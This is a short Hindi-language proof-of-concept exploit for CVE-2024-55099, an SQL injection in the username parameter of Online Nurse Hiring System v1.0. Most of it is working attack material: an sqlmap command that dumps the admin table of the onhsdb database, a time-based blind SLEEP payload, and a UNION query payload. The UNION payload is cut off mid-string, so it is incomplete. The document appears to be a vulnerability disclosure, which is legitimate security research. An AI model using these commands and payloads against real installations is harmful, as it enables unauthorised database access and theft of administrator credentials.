
CVE-2024-55099 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ऑनलाइन नर्स हायरिंग सिस्टम v1.0 में असैनिटाइज़्ड यूज़रनेम पैरामीटर के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है, जिससे डेटाबेस एन्यूमरेशन और प्रमाणीकरण बाईपास संभव होता है।
sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump---
पैरामीटर: username (POST)
प्रकार: समय-आधारित ब्लाइंड
शीर्षक: MySQL >= 5.0.12 AND समय-आधारित ब्लाइंड (query SLEEP)
Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
प्रकार: UNION क्वेरी
शीर्षक: सामान्य UNION क्वेरी (NULL) - 2 कॉलम
Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---
